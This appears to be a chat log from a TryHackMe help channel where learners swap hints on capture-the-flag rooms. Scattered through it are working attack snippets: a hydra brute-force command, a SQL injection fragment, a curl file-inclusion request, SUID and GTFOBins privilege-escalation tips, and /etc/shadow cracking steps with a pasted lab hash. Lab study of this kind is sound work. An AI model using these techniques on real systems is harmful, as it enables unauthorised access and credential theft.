I do use another VPN whenever I use my VM but I doubt it's the prob
but y'all are smart so
I did this room. If this doesn't match, u can reboot the target and then begin again... When it does the same the second time u must insist, u can still add LHOST after RHOST if u didn't the first time
can anyone give a hint regarding task 8, question 3 of https://tryhackme.com/room/fileinc ?
Sure
Request-Type/Cookie
Hey guys! I'm somewhat stuck on the new IDE room. I've used an exploit to get a shell. So far so good. From a certain file I know that there's an image that might contain helpful information. I know where the user flag is but I cannot access it as I don't have the privileges. Any hints on what I should look out for?
A lot of people got stuck. Me included..
Also a lot of people got help there #898631531910803527
Sometimes my eyes refuse to read what's right in front of me. Thank you mate!
Gave +1 Rep to @prime willow
I had that the last 3 days lol, I know how that feels lololol
huge thank you, I didn't even think about that. I was stuck in different types of URL encodings, then I was thinking that maybe it's something related to the / added after each query I tried to add, cause it looked suspicious xd
Gave +1 Rep to @prime willow
yea I got everything set up, I did the options command, everything should be in order but it can never establish a connection whenever I run it
it starts the reverse TCP handler then sends it, then there's just no response
Good morning/afternoon/evening! Got a query about the KotH Hogwarts room. I am struggling to figure out the 7th (final?) flag. I found three deathly hallow clues ||(search file content for Invisibilty cloak:, Elder wand:, and Ressurection stone:)||, which I guess combine to the final flag. Anyone any thoughts/suggestions?
don't think we usually offer help on active KOTH rooms
what am I missing? Any clues?
what's the Windows anonymous user?
Hello! I'm learning about regular expressions and am stuck on charsets. When excluding a number, does the ^ go into the same charset as the group of files?
no idea
might be a googlable question, eh?
found this
for example
I'll look right into it
Guest?
omg why did I speak so dumb.. it must be Guest, right?
but doesn't it ask me to use "Anonymous"
it does-
I don't really remember that room too well but pretty sure the name "anonymous" is like a whole role in itself
like administrator blah blah
Hi. Not an active KotH room, just food for thought
yeah but it's SMB, so the username is different because reasons
any hints on the IDE room? Tried working it out with the unauthenticated public exploit without success. Should there be anything on that ftp?
I am on the WebAppSec101 room, Task 4, Question 4: "What is the username of a logged on user?". The hint suggested is to use Daniel Miessler's names.txt list to bruteforce the username. There isn't any hint on what tools to use, so I tried using hydra with this command: sudo hydra -l admin -P /home/kali/wordlists/names.txt IP http-post-form "admin/index/index.php?page=login:adminname=^USER^&password=^PASS^" to no avail. Anyone know what tool to use for this? I also thought about enum4linux but there is no SMB
Have not completed the room yet nor am I familiar enough with hydra, but you use -P for a password wordlist, and the wordlist you gave is names.txt for usernames. Switch it from -l to -L /home/kali/wordlists/names.txt
you have the password?
So apparently it's admin admin to log in
but the question is asking for what the username is?
I thought it was admin but it's not
shit dude
wrong post
my bad
glhf
hi, I am stuck in Nmap Live Host Discovery, in Task 7
did you check the crontabs?
me?
no
Da
oh hey, how can I help you
Hi, I am stuck in the Nmap Live Host Discovery room, Task 7
man I'm stuck at privesc
which room
I didn't do that room yet, mate
IDE
ohhh np
Yes, this is why I said crontabs
or the permissions of some bins
hey how can I get the roles
yes im just going through them!
first u need to verify ur acc
type !verify in the thm bot with your token
Yes, I am verified
wait, but my token ??
u will know!
while joining the server I used, that's it now
ohhh
r u from Bangalore?
Wut, no bro haha
ur da made me think of that
yo I am verified
kinda
hahaha let's get a KotH and you will know where I'm at
Da is for the Russian yes
later!
you are from Hyderabad right
dayum!
Hard dox xD
??
yes
coool
Linkedin?
yeah
gg
Holy chips bro, you are lucky range
only 3 people have it now
Its for an event, but it ends...
I've actually wanted to get this role
now what's special about this role
Da
DaDa
Could anyone give a hint for 'Task 8: Blind SQLi - Time Based' of SQL Injection room: https://tryhackme.com/room/sqlinjectionlm -> I have the table schema ||sqli_four ||, but the table name just doesn't seem to come correct. Currently, it is at ||analytics-referrer-% (assume - to be _ )||, I even tried || like 'analytics-referrer-' it works. But when I use = 'analytics-referrer-' it doesn't||
I seem to have tried every alphanumeric character, yet nothing comes to be correct.
Take a look at the syntax in task 7. Practically the only difference is the left part: referrer=admin123' UNION SELECT SLEEP(5),2
Everything else is exactly like in task 7
I think that the table names are probably different?
||nope||
thanks
I fell into a rabbit hole and went onwards to trying everything on a new/different table in that database
Gave +1 Rep to @prime willow
Hi, guys. I'm stuck on a question on Network Services under the Complete Beginner path. Enumerating Telnet, question 6 to be exact. "Based on the title returned to us, what do we think this port could be used for?" I've been entering flags to get more info on the port but to no avail. What should I be looking for when sifting through the nmap docs?
What flags are you using?
I tried sV, sC, A, sS, O and a couple others
A should give it to you
Normally it is X:
https://www.youtube.com/watch?v=fGx6K90TmCI
Could someone give me a hint with python for cyber security please ? I'm stuck on the question "What is the function used to connect to the target website? "
When looking around online the most common functions used to connect to a website are ||requests.get|| and ||urllib.parse|| or ||urllib.request||. What other ones are there ?
Never mind. I realised I needed to include () in my answer
Could anyone pass me a hint on enumeration of the Enterprise box?
Subdomain fuzzing, nmap, and gobuster only yield the /var and /public directory, without me being able to find any further files.
Only port 22 and 80 seem open, although nmap is taking forever to complete the scan.
I'm doing some old rooms https://tryhackme.com/room/hackback2019 (task 13) and I kinda need a hand
Did you find a subdomain?
has anyone finished Holo? I'm stuck on the first privesc
Dm me if you need help
Hi everyone. New to THM.
I'm working through Task 4 - Exploiting SMB
question: "...Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]"...
I don't see scp, but do see scopy. I can't figure out how to use scopy to get the id_rsa file off the target server to my local (attackbox) machine so I assume scopy isn't what I should be using. Can someone help point me at which tool I should use? (T.I.A!)
Can you show me the room?
You should be able to download the file using the get command
I didn't, no.
I'll try that again with a bigger list.
Didn't do the trick.
In the buffer overflow prep room, for overflow2 , my offset is coming ||633|| but seems the answer is ||634||. Is the problem same with everyone, or is it just me?
subdomains-top1million-110000.txt
Thanks for this!
Gave +1 Rep to @prime willow
NetworkServices Task 6 Q1, we just need to scan like this ryt?
nmap <ip>
Any hints for the new IDE room by Bluestorm and 403Exploit? I got a file on the anonymous ftp and found how to read it but I don't understand what the password is and where I'm supposed to use it
If you can't find the port, you might want to scan all ports, as nmap by default only scans the most common 1000 ports. So you would have to add -p- to your command in order to go for all ports.
ok I will try that
Maybe also add -T4 so it will be a bit faster, as it could take some time to scan all ports.
go to #898631531910803527, you should find more information there, maybe someone already asked about it and I also believe more people check that room than here
also be careful about your enumeration, you are missing something I believe, there is more than the FTP server
got it. Thanks!
Gave +1 Rep to @native atlas
Hello, I can't find the right answer for Priv Escalation (Linux) Task 10 Q1. I've done all the other questions but I can't find only this one. When I run echo $PATH there is nothing that fits as an answer. Where am I going wrong? Any hints? Thank you in advance.
Could you post the room link? As the Priv Esc room I found in task 10 has nothing to do with what you explain here
@left thunder Yes , sure . https://tryhackme.com/room/linprivesc
this is the question " What is the odd path in PATH? "
Mh, honestly I don't know any hint or answer to that :/
Can this be a room bug?
Maybe, someone had the same issue and already wrote in #room-bugs, it's one of the latest comments
Oo yes, I saw it now. Thank you for the help
Any luck on this?
No still does not work. Nothing from the command works
Hey there! Would anyone have a hint for room oscommandinjection:
What popular network tool would I use to test for blind command injection on a Linux machine?
I've been trying all tools I could think of (I must not know of it).
Even tried looking it up but most searches ended up with Commix (also tried searching for Commix alternatives to no avail).
EDIT Got it.
Been trying to do https://tryhackme.com/room/fileinc Task 8, question 3. Pretty lost. I can't seem to figure out how to bypass the filtering
You can find the answer somewhere in the attached image.
If you want a bigger hint:
||Look at the first point||
Yeah, that's what I've been playing with. ||Cookies and HTTP Headers|| and not making any headway, sadly
||That's not it||
Hmm, okay thanks.
Alright, Been trying for about another hour and still no luck on this. Now I'm trying to ||POST the request, but can't seem to use %00 to null the .php||, am I barking up the wrong tree again?
Hmm, that's worked for me. I used ||cURL||
I had some initial issues with this one. Just follow the inspect element -> change stuff steps like in the previous tasks then this should work. When I used something like Burp for some reason I could not get it to work.
Hmm... yeah I went to ||curl|| and got it to work. couldn't get it to work in ||browser or burp||. Thanks for the tips.
Sad to say I'm having a bit of trouble with File Inclusion Challenge 3
Nevermind, found the solution
yeah, I'm just stuck on nulling the php. can't seem to make it work any which way I try it
aaaaahhhh I GOT IT
I was doing Jr Pen Test, stuck at LFI flag3 which doesn't accept any special char or number
A small hint please thanks
Hello, I'm doing the Network Services part 2 room and I'm not sure which nmap flag I'm supposed to use to find the open port
the question indicates there is 1 port open
I tried -sV and -sT
Have you tried -p- for all ports?
:))
I'll try that
Any nudge on LFI chall3, pls? I read the convo above but still can't get it
look through curl --help and see the different ways to send a file
Do I have to upload a file?
no. just send a request for one
I chose my words wrong. Should have said integrate
Oh, ok, I'll try. Thanks!
I'm just very dumb
Thank you, I got it!
Dunno why I didn't think of this in the first place
hello, I have a question, I am unable to crack the hash through john: Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
the error I am getting is this: Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
the command I used is john id_rsa --wordlist=/usr/share/wordlists/rockyou.txt
any hints for the linprivesc room task 9
could you post a screenshot of what you're doing please?
in order to post screenshots, you need to verify :P
!docs verify
Did you crack this ssh key with ssh2john first?
I'm stuck with that blind SQL question in the room
I got the database by doing LIKE statements but then stuck going next.
link-https://tryhackme.com/room/sqlinjectionlm
Room - SQL Injection
Task - 8
I tried everything and got to know the table name but what to do?
hello, can anyone help with the "Walking an Application" pen testing course? Having a problem with finding 2 questions. One being "What is the flag from the HTML comment"
So did you go through the page source code?
yes, I've been looking at the first page source code. then I went to the other web site from the bottom of the page source code. but I can't seem to find the answers to 1, 3 and 4. it's been 2 days of me clicking and reading everything.
Well I have not done that room yet, but as it states it is a comment, you could for example right click and press view page source and then search (Ctrl+F) for <!-- as a comment in the page source will start with that.
yea I did that on both pages, I'm looking over both websites' source code as we speak but there is only 1 comment at the top of the page and that's not the flag.
I just did that question. There is a comment on top of one of the pages' source code that leads you to another page, where you will find the flag.
wow... smh... that simple. I was thinking it would be links you could click on like number 2. so one last question, any hints on 3 and 4, and then I'm done for today. Please and thank you.
Gave +1 Rep to @left thunder
Well, you should maybe always go for the simple things first
So for question 3. If for example you look at the page source from the home page, you can see some links to resources like jquery.min.js or site.js. These files are stored in a folder, so you might want to try if you can simply open that folder in your browser
I didn't get you in trouble did I? just seen something pop up saying "robocop gave plus1 rep to you"
Oh nono, that's actually good for me, as it gave me reputation
Try to scan with the -sV or -A flag instead of -sT on that port (so no need to scan all ports again)
Does there have to be a space between the flag and the port number?
Gets stuck at 0.00 percent with either of those options
Well I don't know why it's stuck, maybe restart the target machine or check if the target machine expired
in the 3rd challenge of fileinc, I could actually make it bypass the filtering but it doesn't interpret the null terminator, don't know what to do
Alright, so that should give you the answer to your question
@left thunder ok, I'll try to figure it out. it's just that the format in which the answer has to be is throwing me off
Well it's basically just like that, "A banana" or "A car"
ok thank you for the help
Figured it out ❤️
What is meant with "What is the odd path in PATH?"?
edit: got it, but it wasn't in path
@left thunder for task 3 question 3 walking an application. From what I can read I am supposed to open a directory in the web browser to find the flag.txt file. How do you go about opening the directory
Can I get a hint for Authentication Bypass task 4
I've read everything multiple times and done as it says, and been messing with the site to try to get the support ticket
but either I can't find the link in the output, or I'm doing something incorrect
Well did you find the directory yet?
task 6 q3, can someone lend me a hint?
I don't know what that means yet. After talking with other users it has been suggested I finish some other learning paths to further my education first. Thank you for the hint
Gave +1 Rep to @left thunder
Hey guys is https://tryhackme.com/room/meterpreter supposed to be vulnerable to ||ms17_010||? Can't seem to get it to work.
Getting: Rex::Proto::SMB::Exceptions::LoginError: Login Failed: Connection reset by peer
Bump
You saw that there are creds you can use with exploit/windows/smb/psexec right?
oh?
ohhh....
uhhh.... that's an oversight on my part haha
Ye, happens
it should be unquotedpathservice.exe right?
well... thanks
even if I feel dumb there's at least a way forward haha
Gave +1 Rep to @left thunder
Nothing to feel dumb about, that happens to all of us
Hey there
h
https://tryhackme.com/room/linprivesc
task 7 q2
--help
??
no perms
I didn't get u
I can't find anything useful in the SUID files
have you taken a look at SGIDs as well?
I described the 2nd stage of this privesc "accidentally", gl!
well uhhh coming back with another request for a hint with the meterpreter room.
Task 5 Question 6
I found the answer but I can't input it
then it's not the answer™️
It is...
1000%
the next question asks the content of the file which I have correct
the sixth question asks for the path (and it won't accept the path I put in)
I got a doubt! what's the difference between -4000 and +4000 in the find cmd while checking out for suid/gid
You put the path without the file itself, right?
I personally use /2000
yup
with forward slashes
okay so this might sound weird but I think -4000 includes -2000 etc
and +4000 above 4000
ah! I got it
probably incorrect, but that follows the logic of the dates in the find cmd
What's the path you tried? You might delete the message after I saw it ^^
well I use find / -type f -perm -4000 2> /dev/null every time.
Try it with backslash, as well as a backslash at the end.
Thanks once again, haha
Gave +1 Rep to @left thunder
THM bamboozled me with the placeholder
@rustic surge I checked the SGID, still nothing useful
don't be based
what does that mean... is it a kinda SGID file
idk why I'm unable to get it
b64
umm! but i can't access this
with base64
Go to GTFOBins if you're stuck
yeah! I tried every single cmd lol
sounds interesting
Guys in the SQL Injection task 8 ... I am not getting an answer
Clearly you didn't. GTFOBins shows you how to read files you don't have access to with an SUID base64
Look at the first one
or maybe I think I need eye surgery
how about both
Lol. Happened to me with something even dumber last week. Don't worry
why ./base64? can you not run it from path?
even that didn't work
I specified the path
lol! I got it
nvm solved
this thing was kinda interesting
oh good, I was trying to figure out which question you were on.
haha..nvm thanks
I used base64 more than I should have on some of those Linux privesc ones
Burp Suite Basics - task 9, connecting through the proxy. Does anyone know what right-click menu it's talking about?
Hey guys... stuck once again on some stupid stuff..
Doing Burp Suite: Repeater T6Q3.
Added the header and sent the request successfully but I get an empty response.
I feel like none of the responses that make sense match the answer format. Like "send to repeater" doesn't work
can u send the link
ffs I figured out my issue... I really have to read...
Needed 2 blank lines at the bottom (only had one)
yeah! true ! it won't work without those two blanks at the bottom
no idea! I prefer Burp's browser
I think, those are two CRLF as stated in HTTP Protocol
lol I'm about to skip it but I'm halfway through it and I want my tickets
lol
Can anyone help me with the file inclusion rooms last challenges?
I can't figure out how to use post to modify the form requests
Been banging my head on it for hours now
flag 3 or the playground?
Flag 1 itself
ohhh yea that one was weird for me. In Firefox open with inspector and stay in the inspector tab. Don't go to network
you have to modify the body line that says action=# and the method
then do your file inclusion on the bar like normal..if that makes sense..like on the actual web app
So change the method from get to post, and then simply add the file extension on to the http link ryt?
umm okay! I dumped the /etc/shadow but having trouble with cracking the salted hash
not file inclusion though
I was trying with this initially, but since I haven't figured out how to use POST, idk what to do with curl
curl -v http://IP/challenges/chall1.php -d 'file=where the flag goes' -o "your ouput"
Woah, alright, lemme see how this works, thanks for the help
I don't think I cracked a single salted hash
ummm I didn't get u
$6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh.Cl.VV1mb/
this is what I got
let's see.. I didn't look at them all so maybe I did. I copied shadow to shadow.txt and passwd to passwd.txt
unshadow passwd.txt shadow.txt > unshadowed.txt
then I ran john against the unshadowed.txt file
I didn't do anything outside of that. One thing I did notice though is you have to be in the right VM for each challenge
sometimes I would keep using the same VM and it just wouldn't work
ah ! okay lemme see!
aight so I ran this command,
curl -v http://10.10.101.53/challenges/chall1.php -d 'file=/etc/flag1' -o "ans_flag.txt"
and I got the source code as output in the txt file, what do I do now? Or did I do something wrong?
sorry if I seem clueless, am new to this
the flag isn't at the bottom?
nope, at the bottom, the only extra part is it mentions the file location of the link, and this
<h5>File Content Preview of <b>/etc/flag1</b></h5>
<code>F1x3d-iNpu7-f0rrn
</code>
</div> </body>
</html>
I cracked the passwd of user2 and logged into it
hah
i kms
XD
I need to escalate now
to read the flag
okay! it's confusing
Not finding the login creds for the new Windows PrivEsc room https://tryhackme.com/room/winprivesc I tried the user:password321 that the other Windows PrivEsc rooms use but it isn't working. So far it's a great room too.
Hey could someone give me a hint on flag3 for the FileInclusionVM?
The 3rd challenge?
Task 8, capture flag3, sorry
My last wasn't very clear. I've gone through a lot of manual checks.
But I keep noticing a '.php' being added to my input. And it seems to be filtering on special characters and numbers.
Read through the W3 PHP filters and noted a few ways it might be doing some sanitation.
Have you tried methods other than GET?
Yes. Been using repeater to test methods GET and POST
I've tested manually adding %00 and the hex escape also
For GET, Started using php:filter//convert.base64-encode/resource=welcome
To try and get the b64 out but it is heavily filtered
Hm ok so I should refocus on a something simpler.
Yes
So going back through the POST requests I've sent, they are all being filtered completely down to a blank '.php'
Is this one of the language examples?
No
Remember that POST requests are you sending data to the server. You aren't necessarily asking for anything to be returned back to you
Am I supposed to be trying to inject some PHP that affects the include_path function?